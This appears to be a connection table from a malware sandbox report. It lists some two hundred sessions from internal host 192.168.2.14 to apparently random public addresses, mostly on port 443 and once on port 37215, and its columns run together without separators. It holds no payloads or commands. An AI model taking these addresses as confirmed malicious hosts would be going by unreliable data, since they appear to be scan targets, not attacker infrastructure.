                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17853192.168.2.1439318158.131.49.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17854192.168.2.1445712139.60.124.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17855192.168.2.145355284.37.182.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17856192.168.2.1456378106.31.164.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17857192.168.2.1432784135.245.73.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17858192.168.2.1460576179.29.0.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17859192.168.2.1455964100.165.190.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17860192.168.2.1443734152.2.227.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17861192.168.2.1433118129.218.33.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17862192.168.2.1442794142.174.162.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17863192.168.2.1452630178.17.6.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17864192.168.2.145516857.215.184.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17865192.168.2.1458558115.222.48.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17866192.168.2.1460076151.248.253.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17867192.168.2.145525437.134.3.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17868192.168.2.1455936117.114.157.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17869192.168.2.144423243.137.190.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17870192.168.2.145285094.216.33.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17871192.168.2.14541969.205.208.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17872192.168.2.145143876.152.71.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17873192.168.2.144721625.8.119.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17874192.168.2.1456474170.217.28.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17875192.168.2.143520031.218.165.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17876192.168.2.145024620.211.178.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17877192.168.2.1445132185.142.198.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17878192.168.2.1436306185.26.168.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17879192.168.2.144812260.176.104.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17880192.168.2.1437568169.232.139.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17881192.168.2.1444580176.58.136.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17882192.168.2.144920860.204.176.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17883192.168.2.1456094140.2.57.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17884192.168.2.144911291.54.150.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17885192.168.2.1456704165.187.207.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17886192.168.2.1438822158.31.141.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17887192.168.2.145225223.94.44.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17888192.168.2.1452520128.137.173.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17889192.168.2.1458716221.75.83.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17890192.168.2.1434542133.222.34.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17891192.168.2.14368262.140.199.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17892192.168.2.1444958188.82.6.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17893192.168.2.144111887.34.143.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17894192.168.2.1453426175.194.16.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17895192.168.2.143920894.122.213.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17896192.168.2.1437952137.87.249.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17897192.168.2.1440012139.195.56.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17898192.168.2.1444742130.8.119.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17899192.168.2.1446980138.84.52.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17900192.168.2.1459736119.241.114.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17901192.168.2.1448656184.156.206.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17902192.168.2.1442306195.188.180.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17903192.168.2.1438148191.41.128.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17904192.168.2.1455812144.61.65.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17905192.168.2.144002865.191.118.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17906192.168.2.1437190147.30.207.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17907192.168.2.1458488102.219.73.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17908192.168.2.145041296.133.224.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17909192.168.2.1446766169.139.43.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17910192.168.2.144125671.215.67.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17911192.168.2.1446236190.57.32.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17912192.168.2.143313892.99.91.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17913192.168.2.1434988119.81.124.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17914192.168.2.1460446122.94.161.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17915192.168.2.1437892221.167.32.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17916192.168.2.1459970140.180.82.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17917192.168.2.1446378197.92.114.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17918192.168.2.1438328179.206.9.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17919192.168.2.1458550216.227.196.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17920192.168.2.145131672.129.133.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17921192.168.2.1448812207.3.21.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17922192.168.2.1454588164.183.90.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17923192.168.2.144998440.103.153.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17924192.168.2.145758441.221.221.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17925192.168.2.1456944104.180.239.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17926192.168.2.143949878.230.148.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17927192.168.2.1443404195.184.10.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17928192.168.2.145873642.141.128.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17929192.168.2.1452086167.155.47.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17930192.168.2.1445400185.42.54.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17931192.168.2.146047284.231.99.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17932192.168.2.1443166202.234.171.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17933192.168.2.145510620.109.143.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17934192.168.2.145367851.19.37.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17935192.168.2.1439628116.79.204.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17936192.168.2.1435238143.236.17.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17937192.168.2.1447150189.35.199.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17938192.168.2.144834484.119.161.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17939192.168.2.144179451.61.165.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17940192.168.2.1456562118.99.5.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17941192.168.2.1456342135.95.18.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17942192.168.2.1449416166.153.146.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17943192.168.2.145971866.186.33.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17944192.168.2.144851095.147.239.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17945192.168.2.145996046.98.225.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17946192.168.2.145218285.17.127.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17947192.168.2.1447042178.23.168.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17948192.168.2.1450504143.143.139.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17949192.168.2.143445292.0.17.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17950192.168.2.144741669.133.145.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17951192.168.2.1450288129.92.35.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17952192.168.2.145602665.116.172.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17953192.168.2.1454152120.141.98.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17954192.168.2.1444318115.210.121.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17955192.168.2.1457768158.255.68.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17956192.168.2.143727454.213.132.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17957192.168.2.145743473.226.238.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17958192.168.2.1435906124.75.124.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17959192.168.2.143464674.193.248.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17960192.168.2.1451100194.105.13.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17961192.168.2.1443442204.136.201.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17962192.168.2.1437836133.225.128.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17963192.168.2.1457376223.131.0.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17964192.168.2.1454684195.74.149.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17965192.168.2.144134862.197.120.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17966192.168.2.1442414107.182.11.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17967192.168.2.1434218191.137.119.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17968192.168.2.143290252.160.197.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17969192.168.2.144634664.151.99.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17970192.168.2.145368445.147.79.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17971192.168.2.1440570183.190.178.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17972192.168.2.1456648181.202.74.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17973192.168.2.1434210191.169.45.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17974192.168.2.1451922197.235.88.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17975192.168.2.1437856165.5.72.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17976192.168.2.144397098.146.227.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17977192.168.2.1437828143.154.223.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17978192.168.2.1444336191.63.211.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17979192.168.2.1436972112.210.81.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17980192.168.2.143673099.179.123.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17981192.168.2.144387618.159.159.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17982192.168.2.1450318173.154.231.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17983192.168.2.1459854125.27.231.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17984192.168.2.144416014.249.118.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17985192.168.2.1459024110.30.119.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17986192.168.2.144831066.249.84.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17987192.168.2.143591666.170.230.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17988192.168.2.1445178197.148.245.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17989192.168.2.1453900146.117.128.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17990192.168.2.143597647.67.6.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17991192.168.2.1459920190.38.233.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17992192.168.2.1453174206.49.161.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17993192.168.2.145523671.240.52.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17994192.168.2.1439126113.236.83.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17995192.168.2.1457426134.143.18.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17996192.168.2.1460798190.255.245.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17997192.168.2.1433194157.31.181.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17998192.168.2.1435586117.236.46.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17999192.168.2.1432848180.171.91.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18000192.168.2.1450294149.203.85.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18001192.168.2.144479264.23.109.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18002192.168.2.1456488220.68.65.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18003192.168.2.143652249.42.126.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18004192.168.2.1449480181.251.208.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18005192.168.2.145325465.181.101.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18006192.168.2.145286683.73.151.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18007192.168.2.1437090172.127.110.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18008192.168.2.1458518219.98.121.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18009192.168.2.143698247.133.213.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18010192.168.2.1451088132.239.252.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18011192.168.2.143372078.176.181.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18012192.168.2.1450212146.101.2.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18013192.168.2.144393847.27.235.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18014192.168.2.144067865.225.105.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18015192.168.2.143567298.226.246.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18016192.168.2.1451068154.151.191.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18017192.168.2.143429868.112.126.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18018192.168.2.1448440181.4.250.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18019192.168.2.1436222108.148.195.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18020192.168.2.144885245.187.188.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18021192.168.2.1435688207.54.173.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18022192.168.2.144592278.178.158.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18023192.168.2.1436210193.124.242.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18024192.168.2.1439212128.56.55.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18025192.168.2.143812068.79.27.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18026192.168.2.1443006160.226.190.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18027192.168.2.1452734213.191.99.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18028192.168.2.1456498130.67.6.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18029192.168.2.1438250138.35.218.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18030192.168.2.145200869.124.18.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18031192.168.2.1453060155.151.147.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18032192.168.2.1452268170.7.193.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18033192.168.2.1456818195.16.86.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18034192.168.2.1460600211.89.50.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18035192.168.2.1435702107.57.31.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18036192.168.2.14521801.184.38.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18037192.168.2.143413614.48.43.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18038192.168.2.1453522168.145.109.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18039192.168.2.145603032.173.194.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18040192.168.2.144664294.165.51.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18041192.168.2.1437660203.203.95.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18042192.168.2.146058054.27.215.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18043192.168.2.14544301.146.40.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18044192.168.2.1451740154.187.85.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18045192.168.2.1446600132.0.77.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18046192.168.2.1458122103.40.247.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18047192.168.2.145419478.3.206.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18048192.168.2.1456284110.204.116.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18049192.168.2.144210297.152.17.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18050192.168.2.1437392167.209.51.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18051192.168.2.1446814218.195.199.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18052192.168.2.1433968130.44.1.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18053192.168.2.144379260.245.2.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18054192.168.2.1453748130.140.179.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18055192.168.2.144381897.99.108.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18056192.168.2.1450302130.86.206.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18057192.168.2.144345489.19.143.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18058192.168.2.143662039.135.102.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18059192.168.2.1451490201.208.9.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18060192.168.2.144608431.185.220.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18061192.168.2.1460174155.149.172.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18062192.168.2.1458230145.203.135.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18063192.168.2.1458958158.169.254.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18064192.168.2.145852661.129.187.14443
                                                        TimestampBytes transferredDirectionData


